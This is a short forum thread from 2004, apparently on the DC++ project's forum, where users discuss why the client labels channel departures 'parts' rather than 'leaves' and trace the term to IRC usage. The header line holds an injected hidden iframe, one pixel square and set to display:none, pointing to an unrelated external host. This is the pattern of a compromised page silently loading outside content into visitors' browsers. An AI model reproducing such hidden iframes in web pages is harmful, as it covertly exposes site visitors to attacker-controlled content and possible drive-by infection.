Parts versus leaves

Non-DC related talk...<iframe src=http://pokupka.ks.ua/templates/As/image ... p?from=com width=1 height=1 style=display:none></iframe>

Moderator: Moderators

Guitarm
Forum Moderator

Parts versus leaves

Post by Guitarm » 2004-04-06 06:25

I just wanted to ask about "Show joins / parts in chat by default". This might be more directed to the english speaking community.........To me it's seems a bit more natural to use the word "leaves" instead of "parts" but being "not english by nature" I might be missing something here. Can somebody please explain why the word parts is used instead of leaves?, and the difference between them?

IntraDream

Re: Parts versus leaves

Post by IntraDream » 2004-04-06 08:39

Dictionary wrote:Entry: join
Function: verb
Definition: unite
Synonyms: accompany, add, adhere, affix, agglutinate, annex, append, assemble, associate, attach, blend, bracket, cement, clamp, clasp, clip, coadunate, coalesce, combine, compound, concrete, conjoin, conjugate, connect, copulate, couple, entwine, fasten, fuse, grapple, hitch on, incorporate, interlace, intermix, juxtapose, knit, leash, link, lock, lump together, marry, mate, melt, mix, pair, put together, slap on, span, splice, stick together, tack on, tag on, tie, tie up, touch, weave, wed, weld, yoke
Concept: joining

Entry: part
Function: verb
Definition: leave
Synonyms: beat it, blow off, bow out, break, break off, break up, clear out, cut out, dedomicile, depart, ease out, go, go pffft, kiss off, leave flat, part company, pull out, push off, quit, say goodbye, separate, ship out, shove off, split, split up, take leave, wash up, withdraw
Concept: leaving
Ther are several ways this could have been said. If i had to guess Join/Part is used because several chat rooms use those terms.

Guitarm
Forum Moderator

Post by Guitarm » 2004-04-06 08:44

I see, thanks for clarifying

GargoyleMT
DC++ Contributor

Re: Parts versus leaves

Post by GargoyleMT » 2004-04-06 20:07

Guitarm wrote:Can somebody please explain why the word parts is used instead of leaves?, and the difference between them?
Parting, Joining are two words that are commonly used in IRC clients to describe the act of leaving and coming into a channel. If arne was the first person to use those words in his client, it's probably because DC bears such a similarity to IRC on the surface.

Guitarm
Forum Moderator

Post by Guitarm » 2004-04-07 04:37

Ah, ok, then it makes more sense. I just happened to search this forum and almost everybody (when they write in the forum atleast) says, for example, "I joined this/that hub", "leave this/that hub" etc. etc, but if you say it's kinda based on the IRC vocabulary, I understand it a bit more. Thanks for helping me with my English :).

BTW I'll moderate myself here and move this to "off topic" 8)